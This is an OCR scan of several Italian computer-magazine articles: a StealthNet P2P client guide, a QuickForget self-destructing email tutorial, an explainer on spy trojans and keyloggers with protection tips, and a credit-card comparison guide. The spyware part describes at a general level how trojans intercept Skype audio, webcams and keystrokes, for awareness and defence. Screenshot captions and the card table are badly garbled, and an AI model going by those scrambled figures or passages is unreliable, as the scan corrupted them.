i parametri di download/upload. Vediamo le sezioni principali che possono tornarci utili. 





C3 

#i 

m 

il 

B 4 

Ricerca 

Download 

Upload 

Condivisi 

Statistiche 

Log 

Configurazioni 



Attivo 

Attivo 

Attivo 


.Attivo 


A-'.ivj- 


Download (6 di 6) | 
Nome file 


■8 .e» aasa mp3 7z 

\ 4 ubuntu 11.04 deskiop-i386 iso 

■ 7 


Attivo (0*0) 

& Verificato (0 *7) 
# Verificato (0 *9) 
& Verificato (0 +8) 

A Verificato (0 -*-5) 

& * Verificato (0 ♦9) 
A# Verificato (0*10) 


I 100 


l‘rooresso 


Dimensione Completato Pro gresso 
6.5 MiB 52 MiB I 

10.2 MiB 2.7 MiB | 

51.6 MiB 21 MiB I 

360.6 MiB 5.3 MiB j 

685.3 MiB 2,8 MiB | 

|0 Manda in coda 

Manda in testa alla coda ^ 
Manda in fondo alla coda 

Mostra informazioni 
Rinomina Download 
Anteprima 
Rimuovi 

Download da Link/Hash 
Download da SNCollection 
Copia Link negli appunti 


Fonti 


2(4V4 
2(5V5 
2 (4)/4 
2(5V5 
2(9)/ 

ISs 


Rimanente Ultimo contatto Velocità Down 


1.3 MiB 
7.5 MiB 
49.5 MiB 
355.3 MiB 
682.5 MiB 


OG. 00:21 51 
OG. 00:21 51 
0 G. 00:22 38 
OG. 00:18 30 
0G. 00 1409 


36.2 Kib/s 
14.1 Kib/s 
3.9 Kib/s I 
26.9 Kib/s 
Ob/s 


Coda 

Comandi inviati 

Comandi ricevuti 





Attivo 

16 11 : 


m 

13 

2 2| 



14 

2 2 



14 

2 2 



E1 15 

3 31 



16 

2 2; 



16 

2 2 






■fto Kib/s (125,2 Kib/s) é4,7 Kib/s (32,0 Kib/sj & 5 ■ 


El PANNELLO DI CONTROLLO 

Ci permette di spostarci 
attraverso le varie sezioni 
di StealthNet 

B BARRA DI STATO 

Mostra la velocità di 
trasferimento globale e indica 
il numero di connessioni attive 

B DOWNLOAD 
(FINESTRA SUPERIORE) 


Mostra i file che abbiamo messo 
a scaricare e ne mostra lo stato 
di avanzamento 

OSTATO 

Può essere Iniziato/Attivo 
(possiamo scaricare e cercare 
tonti) o In coda (il download 
è in attesa: non si può né 
scaricare né cercare fonti) 

B MENU CONTESTUALE 


Ci si accede cuccando col tasto 
destro su un file in download: 
permette di eseguire alcune 
operazioni come metterlo in 
coda, eliminarlo o visualizzare 
ulteriori informazioni 

B GRADIMENTO (SONO I PUNTI 
ESCLAMATIVI MESSI ALL’INIZIO 
DEL FILE) 

Indica il gradimento espresso 
da chi condivide il file. 


Può essere buono (verde), 
indifferente (giallo), cattivo 
(rosso) 

B FONTI 

(LA FINESTRA IN BASSO) 

Mostra informazioni sui Client 
dai quali stiamo scaricando 
ij.tile selezionato 

B STELLA 

Si colora in modo diverso in 


base a quando è stato ricevuto 
l’ultimo pacchetto: blu (meno 
di 12 minuti), verde (meno 
di 24 minuti), giallo (meno di 
36 minuti), rosso (meno di 48 
minuti), grigio (oltre 48 minuti) 

B CODA 

Indica la nostra posizione 
all'interno della coda di upload 
della fonte: lo 0 indica che 
stiamo scaricando 


19 Anonimi in cerca di file 


Ecco come cercare i contenuti e gestire i download. Una precisazione: anche in StealthNet, purtroppo, gira 
materiale illegale. Stiamone alla larga: il nostro obiettivo e tutelare la nostra privacy, non infrangere la legge! 



Connettiamoci alla rete 


■J | Dopo averlo avviato, StealthNet cercherà di 
w collegarsi alla rete RShare. Attendiamo qual¬ 
che minuto affinché in Connessioni vengano visua¬ 
lizzati i peer della rete. Nella barra di stato potremo 
visualizzare la velocità di trasferimento globale delle 
nostre connessioni. In Ricerca digitiamo il nome del 
file che desideriamo scaricare. 


Eseguiamo la ricerca 

Con il primo menu a tendina specifichiamo 
anche un filtro per il tipo di file. Premiamo 
Ricerca e attendiamo il responso: ci vorrà tempo per 
visualizzare i risultati, che verranno indicati con colori 
diversi: Rosso se il file è già presente nei download; 
Nero che sono disponibili 1 o 2 fonti; azzurro che per 
quel contenuto esistono più di 3 fonti. 


^ Gestiamo i download 


3 1 Cliccando col destro su un risultato sceglia- 
%mJr mo se metterlo in download. In Download, 
cliccando col destro su un file, possiamo metterlo in 
coda, rimuoverlo dalla lista o visualizzarne un’ante¬ 
prima (se è un video). In questo caso bisogna instal¬ 
lare VLC e indicare in ConfigurazìoniA/arie/Opziom 
anteprima la cartella con l'eseguibile di VLC. 
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Questa mail si autodistruggerà I 


Ti spio daPCf^ 


Così invii messaggi di posta che si cancellano da soli 

dopo che il destinatario effettua la lettura 


Questa e-mail si 
autodistruggerà! 


Cosa ci 
occorre 

SERVIZIO DI WEBMAIL 

Quick Forget 

Quanto costa 

Il servizio è gratuito 

Scaricabile da: 

https://quickforget.com 


Q uante volte abbiamo pensato di man¬ 
dare una bella e-mail piena di insulti 
al capo che ci ha fatto imbestialire, 
al collega antipatico o al partner che si è 
comportato male? Poi, però, non lo abbiamo 
fatto, pensando alle possibili conseguenze 


(gli antichi ci insegnano che "verba volant, 
scripta manent”). Possiamo però \estire i 
panni degli agenti segreti che si vedono nei 
film e mandare una bella e-mail che si auto¬ 
distrugge! Per farlo, possiamo sfruttare il ser¬ 
vizio on-line Quick Forget. Dopo aver scritto 


il testo della missiva, decidiamo i parametri 
per la cancellazione, che possono essere il 
tempo, oppure un determinato numero di 
volte che la stessa viene letta. Se usata con 
attenzione, questa e-mail a sorpresa può 
regalarci grandi soddisfazioni! 


* | ■ 8Mlg 


| * P W * * - 

- -H Cerca cj £1 Condì**»- - Segnatiib«' V Controllo ortografica • Cj Traduci 

1 • li MassaggioChe-Si Autodptt j QiéekEorgrt con» 'Stjoogie 


QuickForget.com 


V 


tue pro*p*ttive di carriere «ono limitai», perché è chiaro anche ò \ 
viscido serpente e che H tuo ruolo non putì essere altro che quello 
cotieghl per carpite mi preme comunque dirti quello 

^:^/pnilÉIIIISIIMMIIIINllllllUMlÉÌÌÌIHÌÉÉrifiÌÌÉÉÉIIBH 


personalmente dite 


Foryol >1 <iH«r Q|| vicar or hour. 


QuickForget.com 


ufficio. 



A parte che le tue prospettive di carriera sono limitare, pe 
anche al capo che sei un VISCIDO SERPENTE* che 11 tuo rt 
essere altro che quello di strisciare tra l colleglli per carpir 
mi preme comunque dirti quello àie penso personalmente 


QuickForget.com 


ufficio. 

A parte che <e tue prospettive <tì carriera sono limitate, p« 
anche al capo che se. un VISCIDO SERPENTE# che II tuo r 
essere altro che quello di strisciare tra i colleghl per carpi 
mi preme comunque dirti quello che penso personalmenti 


Prepariamo il messaggio 

Colleghiamoci all’indirizzo https://quickforget. 

: corri e digitiamo il testo dell’e-mail nel campo 
The secret is. Il servizio non offre un editor di 
testo e quindi non è possibile applicare alcuna format¬ 
tazione, che comunque avrebbe poco senso visto che 
l’e-mail si autodistruggerà! 


Impostiamo il timer 

H Uno dei parametri utilizzabili per la distruzio¬ 
ne dell’e-mail è il tempo, trascorso il quale la 
missiva "scomparirà". Inseriamo il dato nel 
campo compreso tra views ore hour. Per i sottomul¬ 
tipli dell'ora, scriviamo un numero opportuno prece¬ 
duto dal punto (.30 per la mezz'ora). 


Quante visite hai? 

I L’altro parametro utilizzabile, per essere certi 
\ che l’e-mail venga letta, è il numero di visite, 
I da indicare nella casella Forget it after. Se 
scriviamo 1, subito dopo una prima lettura l'e-mail vie¬ 
ne eliminata. Aumentiamo il numero se vogliamo che il 
destinatario la rilegga. 


ikForget. corri 


che !• tue pnwpéhhr* di ri4rè «tìtio limitati. j»rch# é difarc 
l'zapo tè- uh vrSCJOÒ SERPÈNTE* cfiB II Vi» hioló no* putì 
nitro;eh* putito di strt-sder* C'n i «Sleghi per curerà informazioni, 
r»comjnooedirti «^*110 <h* pmup«r*on*!m*r#a dt t»; \ 


■ olc'wo ih 01 ho» 



Wlcmftins: V.»Attuivi in snudino «HyiiMwIriforrnotlon ÒKOWih «unii. 

i, you cimi «end n esortiamo tlvoiigh rfnAl*. tMw imm.ivoi,-: «ut. «.». ond tc#l 
shoii-'g ’Jwr vikIhiiIjIj bacauiM -irl ilio info»irqfion fs noi In o vlngl's hx-Mlkm 



QuickForget.com 


ts^eifiinnMdt à&mi ai« WUìwW) iiéfeM j*i 

htt ps:/;quKkforoet rom/s.'f*40^8W00<b<o8e<*il5ll*6b<>W4t jjjHì:*: 

. ; r Copy and paste this URI.! 


Shh, tl»« serret ir»: 


iU4*war/ic (oUcqa, 

tì arrivato H oc omento df rftrtt qu*flA c*ih c*m*o <Ii:tÌ»l ) tt>rtis.M, .»l divaria i 
rtnripégnJ /H lurex» * • riferii e tutti «6 che aaadn in wtffoo. 

A parte che le tue prospettivi: di owltró tono Innante, parr/U. * chiaro »i. 
ooi un VISCIDO lERPGNTfe che il tuo ruolo nor. putì ««me altro chp. auwt 
Ira t eoileqhl per carpire mforma/ioni, mi pramr tamunq.^ dirti ctielh, .;h. 



Pronti per l'invio 

Dopo aver impostato il timer per l’autodistru¬ 
zione, possiamo procedere con l’invio della 
missiva. Perfarlo, clicchiamo su Save m ysecret 
e procediamo nel losco affare che stiamo organizzando. 
Verremo reindirizzati su una nuova pagina che riporta 
le istruzioni per l’invio. 



Seguiamo te istruzioni 

| Copiamo il link indicato nella pagina e incollia¬ 
molo in un nuovo messaggio di posta elettro¬ 
nica. Oppure, in alternativa, clicchiamo sul 
pulsante email this link. Verrà automaticamente cari¬ 
cato il Client di posta predefinito. Compiliamo normal¬ 
mente i campi del messaggio e inviamolo. 


Inizia il conto alla rovescia 

a ll destinatario riceverà un’e-mail con il link del 
passo precedente. Incollandolo nel browser 
aprirà la pagina Web su cui leggere il messag¬ 
gio. Trascorso il tempo stabilito o il numero di visite 
impostato, si troverà davanti il laconico messaggio Sor- 
ry, i have forgot this secret! 
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C*Ti spio da PC 


I II PC come microspia I 



.B 


LEGGI 

SUL WEB 


www.winmagazine.it/ 

link/1032 

Il governo svizzero nel 
2006 utilizzò un trojan 
capace di intercettare le 
comunicazioni via Skype: 
eccone una dettagliata 
descrizione. Tra l'altro, 
si legge: "Gli ISPdelle 
persone indagate faranno 
"scivolare" il programma 
allìnterno dei computer de¬ 
gli indagati. Il programma 
registrerà le conversazioni 
e le invierà a un server in 
piccoli pacchetti (...). Una 
volta che le intercettazioni 
sono terminate, il pro¬ 
gramma può disinstallarsi 
autonomamente". Il trojan 
Querela, sviluppato dalla 
nostra Polizia di Stato, 
può essere visto come una 
variante di quel virus 


S e si vuole colpire una persona e car¬ 
pirne tutte le informazioni necessa¬ 
rie, l’obiettivo principe è chiaramente 
il suo PC, dove vengono scambiate ogni 
giorno centinaia di informazioni. Social 
network, e-mail, chiamate VoIP, chat tra¬ 
mite software quali Microsoft Live Mes¬ 
senger o Skype: il computer è diventato 
uno strumento fondamentale nella vita di 
tutti noi, un punto nevralgico di comuni¬ 
cazione con il mondo intero e un ottimo 
aiuto per memorizzare dati personali e 
programmare attività. Colpire il Computer 
di un utente spesso significa riuscire ad 
avere accesso a molte informazioni priva¬ 
te. Questo devono aver pensato i tecnici 
della Polizia di Stalo quando, grazie al 
trojan Querela creato ad hoc e installato 
nel PC della vittima, sono riusciti ad inter¬ 
cettare le comunicazioni del faccendiere» 
Luigi Bisignani (volto noto delle cronache 
giudiziarie) il quale, telefonando tramite 
Skype, si sentiva sufficientemente a I ripa ro 
da orecchi indiscreti visto l'alto livello di 
crittografia utilizzato dal software per le 
comunicazioni VoIP. Non è un caso che la 
stessa tecnica venga utilizzata da molte 
cosche maliose e gruppi di terrorismo, 
i quali, per comunicare tra di loro, non 
usano più i telefoni cellulari, anche con 
schede SIM registrate con profili falsi, 
bensì fanno passare tutte le proprie co¬ 
municazioni tramite Skype, impossibile 
da intercettare. 


Bersagli diretti 

Mai Bisignani avrebbe immaginato che 
la Polizia di Stato sarebbe riuscita ad in¬ 
stallare un trojan nel suo PC capace di 
intercettare e registrare quelle comuni¬ 
cazioni scottanti. In realtà, quello che ha 


come 
microspia 

Così un semplice smanettone 
può trasformare il PC in un 
potente strumento da 007! 
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QUALCUNO SPIA LE NOSTRE CONVERSAZIONI 

Ecco come funziona il trojan capace d’intercettare le comunicazioni Skype: il pirata (1) installa nel PC della vittima (2) 
un virus in grado di registrare in file MP3 i flussi audio della scheda sonora, per poi inviarti ad un server remoto (3). 



VIRUS SPIONI: FUORI DAL NOSTRO COMPUTER 


fatto la Polizia affonda le proprie radici 
in un progetto che risale addirittura al 
2009, quando il ricercatore svizzero Ru¬ 
ben IJnteregger rilasciò pubblicamente il 
codice di un trojan capace di intercettare 
le comunicazioni del Client VoIP (www. 
winmagazine.it/link/1030). Progetto che 
era stato scritto addirittura nel 2006 per 
una compagnia privata che lo vendette a 
sua volta al governo svizzero (www.win- 
magazine.it/link/1031). Ma com’è possi¬ 
bile per il trojan intercettare le comuni¬ 
cazioni di Skype? Il "ladro” abile cerca 
sempre il punto debole di una struttura 
da colpire: se non è possibile intercettare 
le comunicazioni nel mezzo tra la sor¬ 
gente e la destinazione, il punto debole 
sta proprio nel colpire uno dei due pun¬ 
ti della comunicazione, cioè infettare la 
sorgente o la destinazione. D’altronde, sia 
sorgente che destinazione devono essere 
in grado di poter ascoltare e comunicare, 


Il capostipite dei virus"spioni", capaci cioè di inter- 
facciarsi con la scheda audio e la scheda grafica 
installate nel computer per rubare le immagini 
riprese dalla webcam e l'audio ambientale cattura¬ 
to da un microfono, è stato il worm Rbot, scoperto 

[R| lo» WJ2/Rlsot 



nell'ormai lontano informat ;=■—ente parlando) 
anno 2004. La minaccia e :tata comple¬ 
tamente debellata in quante tutti gli antivirus 
aggiornati riescono aa mc r . idearla e rimuoverla, 
e quindi non fa piu pau -a u e sue caratteristiche, 
però, hanno ispirato tant altri virus writer che, 
con alcune variarti sono - usciti ad emulare le sue 
caratteristiche. Qualora i : nostro computer fosse 
comunque rimasto vittima del worm, è possibile 
procedere manualmente con la cancellazione di 
tutti i suoi file infetti. Innanzitutto, scarichiamo 
il file rbotgui.com dal sito www.winmagazine. 
■ ■ ' • Quindi eseguiamolo ciccandoci 

sopra due volte con il tasto sinistro del mouse. 
Nella finestra del Controllo account utente che 
appare premiamo il pulsante Esegui e poi Accept 
Comparirà cosi la semplice interfaccia del tool di 
rimozione ResolveforW32/Rbot. Clicchiamo Start 
Scan e attendiamo pazienti che il programma 
faccia il suo dovere. 










































■ Una foto di Luigi Bisignani risalente a qualche 
anno fa: il faccendiere milanese è la "vittima" più 
illustre del trojan Querela, usato dalla Polizia di Stato 
per intercettare le sue telefonate scottanti. 


di conseguenza i dati non saranno più 
crittografati e sarà possibile intercettarli. 
11 trojan è dunque in grado di sfruttare gli 
strumenti che Windows usa per gestire i 
dati in ingresso e in uscita dalla scheda 
audio del PC, registrare questo flusso in un 
file MP3 e immediatamente inviarlo ad un 
server remoto. Ecco che la comunicazione 
di Skype è stata violata! 

La realtà supera la fantasia 

Mediante l’utilizzo di trojan specifici è 
comunque possibile fare moltissime al¬ 
tre cose, addirittura alcune fuori da ogni 
immaginazione. Si può citare, ad esem¬ 
pio, una puntata di R.I.S, il noto telefilm 
trasmesso in prima serata trasmesso su 
Canale 5. In una puntata viene mostrato 
come una banda di assassini abbia infet¬ 
tato il PC delle proprie vittime al fine di 


registrare, tramite webcam, immagini 
essenziali per poter pianificare un even¬ 
tuale furto nelle abitazioni. Sembrerebbe 
una cosa da telefilm, ma la realtà supera 
addirittura la fantasia. Nel 2004 la società 
di sicurezza Sophos isola per la prima volta 
una variante di un noto worm, denomi¬ 
nato RBot, capace proprio di attivare le 
webcam e i microfoni dei PC al fine di 
registrare tutto ciò che accadeva davanti 
al computer e nella stanza in cui si trova¬ 
va il computer. Con un uso prettamente 
orientato allo spionaggio industriale, il 
malware in questione causò non poco 
clamore nel mondo della sicurezza in¬ 
formatica, visto l'approccio innovativo 
e potenzialmente dannoso che poteva 
arrecare notevoli danni agli utenti e alle 
aziende colpite. 

Siamo tutti a rischio 

Ma non finisce qui: il computer di ognuno 
di noi può essere facilmente trasformato 
in un’enorme spia, una cimice capace di 
intercettare ogni possibile informazio¬ 
ne sul nostro conto. È il caso dei comuni 
keylogger, quei software capaci di inter¬ 
cettare tutto ciò che l’utente digita con la 
tastiera, ogni tasto premuto. L’utilizzo dei 
keylogger è molto più diffuso di quello che 
si possa pensare: la tecnologia è infatti 
presente in qualsiasi trojan studiato per 
intercettare le comunicazioni tramite Web 
browser al fine di catturare dati sensibili 
e password di accesso a conti bancari e 
servizi di pagamento on-line. La cosa che 
rende i keylogger facili da scrivere e allo 


stesso tempo molto dannosi, è l'ampia 
disponibilità in rete di codici sorgenti da 
prendere come esempio e il fatto che tali 
tecnologie possono essere usate senza 
necessità di avere i diritti di amministra¬ 
tore nel sistema da colpire. Una piaga che 
alcuni siti Web di banche hanno cercato 
di sconfiggere utilizzando dapprima le ta¬ 
stiere virtuali, proiettate sul monitor con le 
quali l'utente può interagire con il mouse, 
cliccando sulle lettere che compongono la 
password da inserire. In questa maniera, 
nessun tasto viene premuto sulla tastiera e 
il keylogger non è in grado di intercettare 
la password. 

Gli infostealer sono la nuova 
generazione di keylogger, 
capaci di registrare quello che 
viene digitato con la tastiera 
e catturare le immagini dallo 
schermo inviandole on-line 
ai server remoti dei pirati 
informatici 

Ma, come è noto, per una contromisura 
applicata, esce immediatamente la nuova 
tecnologia di attacco. E i nuovi keylogger, 
che non necessariamente vengono più chia¬ 
mati keylogger, bensì information stealing 
software (o infostealer) visto l'approccio non 
più focalizzato esclusivamente sull'inter¬ 
cettazione della tastiera, sono ih grado di 
catturare le immagini dallo schermo, delle 
istantanee che vengono salvate in formato 



GLI STRUMENTI PROIBITI DELL'HACKER 


I trojan SpyEye e Carberp sono in grado di inter¬ 
cettare tutto ciò che entra ed esce dal browser, 
quindi evitando di dover utilizzare tecnologie 
di keylogging o di screen grabbing. Inutile dire 
che le stesse tecnologie possono essere in grado 
di intercettare tutto ciò che viene scritto tramite 
software di instant messaging quali Skype o Live 


Messenger, vanificando la sicurezza che il softwa¬ 
re implementa nel momento in cui il messaggio 
parte criptato dal computer mittente per arrivare 
al computer del destinatario. 

Mai abbassare la guardia 

L'utilizzo di trojan per poter intercettare i dati per 
sonali presenti all'interno dei PC non finisce qui: 
più di una volta si sono registrate fughe di notizie 
dall'Interno di aziende a causa di computer infetti 
e di trojan capaci di analizzare il PC dei dipendenti 
per individuare file potenzialmente interessan¬ 
ti (relazioni in formato DOC, documenti in PDF, 
database di e-mail e indirizzi personali ecc.). Nel 
mercato nero del Web esistono kit più o meno 


legali e pacchetti di software capaci di spiare i PC 
degli utenti in maniera globale, sotto tutti i possibili 
punti di vista, con supporto annesso dello svilup¬ 
patore, capace di modificare il proprio software al 
fine di evitare che venga riconosciuto dai software 
antivirus. In altre parole, monitorando la webcam, 
il microfono del PC, la tastiera e il mouse, tramite 
un trojan è possi bile trasformare II 
PC di qualsiasi utente in una spia 
perfetta, capace di intercetta¬ 
re tutte quelle informazioni 
che possono far gola al pi¬ 
rata informatico! 


.. 


■'“v 




.aSS- 

in PDF per 











I II PC come microspia I 


Ti spio daPCf^ 


SPIE DIGITALI: ECCO COME DIFENDERSI 


Difendersi da virus, trojan e worm che mi¬ 
nacciano la nostra privacy in Rete e rubano 
dati personali è possibile! Per farlo, è neces¬ 
sario utilizzare software di controllo specifici 
e, soprattutto, farsi guidare dal buon senso 
nell'utilizzo del proprio PC. Ecco le regole 
fondamentali da seguire. 

Regola 1 Installiamo un software 
antivirus aggiornandolo costante- 
mente; molti di questi programmi 
scaricano in automatico le firme virali ad in¬ 
tervalli orari durante l'arco della giornata 

Regola 2 Teniamo il computer sem¬ 
pre aggiornato tramite il servizio di 
distribuzione degli update del siste¬ 
ma operativo, Windows Update: questa è 
un'altra operazione da compiere costante- 
mente, unita all'operazione di tenere aggior¬ 
nati alle ultime versioni anche tutti i softwa¬ 
re installati nel sistema 

Regola 3 Utilizziamo dei software 
capaci di eludere i più semplici trojan 
infostealer, cioè in grado di bloccare 
tali malware dal catturare informazioni tra¬ 
mite il monitoraggio di tastiera, schermo e 
intercettazione del browser Web. Il più famo¬ 
so software gratuito è Trusteer Rapport, sca¬ 
ricabile dal sito www.trusteer.com/webform/ 
download-rapport. Previa richiesta di nome 
ed e-mail, è possibile scaricare il pacchetto 



■ Prevx SafeOnline protegge le connessioni HTTP. 

capace di rendere sicuro il browser da qual¬ 
siasi attacco di malware. 

Regola 4 Come ulteriore garanzia 
di sicurezza per il nostro computer, 
scarichiamo e installiamo il program¬ 
ma gratuito Prevx SafeOnline, specializzato 
nel monitoraggio di tutte le connessioni Web 
che utilizzano il protocollo do comunicazione 
HTTP e HTTPS. 

O Regola 5 È importante, inoltre, uti¬ 
lizzare sempre il buonsenso nell'uti- 
lizzo del proprio PC. Quindi, evitare 
di navigare in siti sospetti, dichiaratamente 
pirata, o siti a luci rosse, i quali spesso nascon¬ 
dono virus informatici. Evitiamo, inoltre, di 
aprire e-mail sospette e di fornire i nostri da¬ 
ti personali (account di accesso e numeri di 
carta di credito a sconosciuti). 







PayPa / 


■Tru&tppr 


This Websile is Proteeted by Ti usteei 


Trusteer protects your interaction withthis website against malware and 
phishing attacks. 


Securitynews 1 fi Help and Support Open Console 


* Durante la navigazione Web, Trusteer Rapport segnala ogni tentativo di furto di dati personali. 


IPEG e inviate on-line al server remoto del 
pirata informatico, riportando secondo per 
secondo il movi mento del mouse sul la tastie¬ 
ra virtuale e permettendo dunque al crimi¬ 
nale di turno di ricostruire la password. Se 
il nostro PC è il nostro confidente personale 
nonché mezzo di lavoro con il quale inviare 
e ricevere dati importanti ed informazioni 


private, dobbiamo prendere in seria consi¬ 
derazione il fatto che queste potrebbero es¬ 
sere facilmente intercettate, ed il nostro fido 
computer potrebbe essere utilizzato contro 
di noi. È nostro compito, du nque, cercare d i 
garantire sempre il massimo livello di sicu¬ 
rezza per proteggere la nostra vita virtuale 
e, di riflesso, anche quella reale! ■ 
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I Acquisti sicuri a prova di frode I 


econdo alcune statistiche, in Italia circole- 
ben 34 milioni di carte di credito, 
di cui solamente la metà, circa 15 milioni, 
sarebbero attive. A dispetto di questi dati, però, il 
nostro Bel Paese risulta nelle ultime posizioni fra 
le nazion i europee che si affidano allo scambio 
elettronico di denaro. Come a confermare che 
gli italiani preferiscono ancora avere in tasca i 
cari e vecchi soldi, magari non confidando su 
sicurezza e convenienza delle carte di credito. 
Eppure, i vantaggi che si otterrebbero dall'uso 
di sistemi di pagamento elettronici sarebbero 
davvero consistenti. Ad esempio, è stato stimato 
che si potrebbero recuperare ben 40 milioni di 
euro dall'economia sommersa, arricchendo il 
Paese e il suo P1L del 3%. Certo è che, per affidarsi 
a una carta di credito, bisogna poterla valutare 
e, soprattutto in Italia, le banche non sempre 
forniscono prospetti economici chiari e le infor¬ 
mazioni risultano spesso lacunose. Per scegliere 
la carta di credito giusta, in realtà, non servono 1 
esperti di finanza. In primis, bisogna conoscere 
le tipologie di carte proposte dalle banche e 
dagli altri enti adibiti al rilascio di una linea di 
credito. Poi, bisogna valutare la convenienza 
in termini economici della stessa, calcolando i 
costi di gestione sulla base di tutte le spese, dal 
canone annuo all'invio dell'estratto conto, dagli 
anticipi di contante in euro e in valuta straniera 
ai sistemi di alert e via discorrendo. 


Tradizionali, prepagate, usa 
e getta... le varie tipologie 

Esistono di base cinque tipologie differenti di 
carte di credito, di cui in realtà solo tre sono 
le più diffuse. Le carte di credito tradizionali 
sono le prime ad essersi sviluppate nel pano¬ 
rama finanziario. Queste sono identificate da 
16 numeri posti in rilievo sulla parte frontale, 
che indica il circuito creditizio, la banca emit¬ 
tente, il conto collegato e un codice di controllo. 
Sono inoltre dotate di microchip in accoppiata 


C^Ti spio da PC 


■on-line 
ni frode 


Scegli la carta di credito giusta e 
compra s|l Web in tutta sicurezza. 
Ecco le regole da seguire 
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CARTE DI CREDITO: LA GUIDA PER SCEGLIERE QUELLA GIUSTA 

Una classifica di carte di credito attualmente disponibili sul mercato. L'utilizzo di riferimento per la classifica è di 12 estratti conto 
annui superiori a 77.47 euro, con un profilo di spesa di 4.500 euro (Fonte: Altroconsumo). 



CARTIMPRONTA 

WEBANK 

WeBank 

Visa, MasterCard, 
MasterCard 
Paypass 

Correntisti 

Webank 

6,00 

30,00 

0 

CARTA ARANCIO 

Ing Direct 

Visa 

Correntisti 
c/c Arancio 

6,00 

66,00 

0 

CARTA EGO 
CORRENTISTI 

Crederti 

Visa, MasterCard 

Correntisti 

Crederti 

6,00 

14,04 

29 

VISA INCHIARO 

Banca Sella 

Visa 

Clienti 

Polizza 

Inchiaro 

6,00 

6,00 

0 

CARTA FINECO 

Fineco 

Visa, MasterCard 

Correntisti 

Fineco 

6,90 

6,90 

0 

CARTA 

ALTROCONSUMO 

Banca Sella 

Visa 

Soci Altro 
consumo 

7,00 

15,52 

10 

CARTA CHE BANCA 

Mediobanca 

MasterCard 

Correntisti 

Chebanca 

14,82 

20,82 

12 

FIDATY PLUS 

Deutsche Credit 
card 

MasterCard 

Clienti 

Esselùnga 

18,50 

28,70 

0 

MASTERCARD 
CLASSIC PLUS 

Banca 

Antonveneta 

MasterCard 

Correntisti 

gruppo 

Mps 

24,12 

24,12 

33 

VISA CLASSIC 

Banca Sella 

Visa 

Correntista 
Banca Sella 

24,66 

33,18 

31 

MASTERCARD 

CLASSIC 

Banca Sella 

MasterCard 

Correntista 
Banca Sella 

24,66 

33,18 

31 

PALLACANESTRO 

BIELLA 

Banca Sella 

Visa 

Tifosi 

pallacanestro 

Biella 

24,68 

30,68 

26 

CRAL TELECOM 

Banca 

Antonveneta 

Visa 

Soci Crai 29,34 

35,58 

0 

CARTA INSIEME 

PIÙ 

Banca 

Antonveneta 

Visa electron 

Clienti 

Conad 

29,34 

29,34 

0 

MERIDIANA 
BPERCARD CLASSIC 
FLESSIBILE 

Banca di Sassari 
Divisione 
Consumer 

MasterCard 

Clienti 
Meridiana 
e EuroFly 

30,40 

42,76 

15 

BARCLAYSGOLD 

Bardays PLC 

Visa 

Correntisti 

Bardays 

30,97 

40,21 

0 

BARCLAYCARD 1IC 

Bardays PLC 

Visa 

Clienti lic 
Global 
Group 

30,97 

40,21 

0 

CARISMI 

BARCLAYCARD 

Bardays PLC 

Visa 

Clienti 

Carismi 

30,97 

40,21 

0 

BARCLAYCARD 

CLASSIC 

Bardays PLC 

Visa 

Per tutti 

30,97 

40,21 

0 

BARCLAYCARD 

PREMIUM 

Bardays PLC 

Visa 

per tutti 

30,97 

40,21 

0 


2,00 

5,00 

0,67 

0,00 

0,00 

0,71 

0,50 

1,85 

0,00 

0,71 

0,71 

0,71 

0,52 

0,00 

1,03 

0,77 

0,77 

0,77 

0,77 

0,77 


0,00 

0,00 

0,00 

0,00 

0,00 

0,00 

0,00 

1,00 

0,00 

0,00 

0,00 

0,21 

0,00 

0,00 

0,00 

0,00 

0,00 

0,00 

0,00 

0,00 


3%; min 3 euro 

3%; min 3 
euro 

2 euro 

3 euro 

4%; min 2,5 euro 

4%; min 2,5 
euro 

2%; min 1,54 euro 

2%; min 1,54 
euro 

2,9 euro 

2,9 euro 

2%; min 0,51 euro 

2 euro 

2,5 euro 

2,5 euro 

3% 

3% 

3%; 

3%; 

min 3,62 euro 

min 3,62 euro 

4%; min 0,51 euro 

4%; min 5,16 
euro 

4%; min 0,51 euro 

4%; min 5,16 
euro 

2%; min 1,54 euro 

2%; min 5,16 
euro 

3%; min 3,62 euro 

3%; min 3,62 
euro 

3%; min 3,62 euro 

3%; min 3,62 
euro 

4%; min 3 euro 

4%; min 3 
euro 

4%; min 2,5 euro 

4%; min 2,5 


euro 

4%; min 2,5 euro 

4%; min 2,5 
euro 

4%; min 2,5 euro 

4%; min 2,5 
euro 

4%; min 2,5 euro 

4%; min 2,5 
euro 

4%; min 2,5 euro 

4%; min 2,5 
euro 


alla banda magnetica tradizionale. Sul retro è 
presente il codice di sicurezza a tre o quattro 
cifre, indispensabile per alcune transazioni 
on-line. Queste carte offrono la possibilità di 
pagare anche senza disponibilità finanziaria 
sul conto, in quanto il vero e proprio addebito 


avviene una volta al mese. Ovviamente de¬ 
ve essere usata con criterio, per evitare spese 
folli che poi non possono essere sostenute. A 
garanzia dell'utenza e dell'ente emettitore c’è 
comunque un massimale, oltre il quale non è 
possibile spendere. Le carte revolving, invece, 


si differenziano da quelle tradizionali in quanto 
consentono il rimborso di quanto speso a rate, 
invece chein un’unica soluzione, incorporando 
così una linea di credito basata su un importo 
fisso o percentuale di restituzione, associato 
a un interesse mensile, previsto da contratto. ► 
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CHE COS'È IL MOBILE 
PAYMENT? 

In Italia sta per partire il Mobile Payment. Si riferisce 
a tutte le operazioni di pagamento che vengono 
effettuate esclusivamente via telefono cellulare e 
che abbiano come risultato finale il trasferimento di 
denaro tra due soggetti (pagatore e beneficiario), 
per mezzo di una o più tecnologie tra SMS, USSD, 
IVR, Drop Cali, NFC, protocolli Wap e i-mode, librerie 
STK, applicazioni JAVA, e reti sia cellulari (GSM, 
UMTS) che Wireless (Wi-Fi). La Banca d'Italia ha già 
emanato il provvedimento attuativo che stabilisce i 
diritti e gli obblighi delle parti, in quanto l'adozione 
dei sistemi di pagamento mobili porteranno nelle 
casse dello Stato risorse nella misuradi 20 miliardi 
di euro derivanti dall'emersione del sommerso e 10 
miliardi conseguenti dall'abbattimento dei costi 
di gestione del contante. 


Le carte prepagate invece si sono diffuse grazie 
all'avvento di Internet e del commercio on-line. 
Incorporano di norma un credito utilizzabile 
fino a esaurimento e sono: ricaricabili, quando 
possono essere utilizzate più volte (ripristinando 
il credito in banca, alla posta, presso gli sportelli 
automatici, via Internet o presso le ricevitorie 
S1SAL); usa egetta, quando sono utilizzabili solo 
una volta limitatamente alla somma prepagata. 
A questi tre tipi di carte, si affiancano poi le carte 
co-branded, emesse da un march io affermato, 
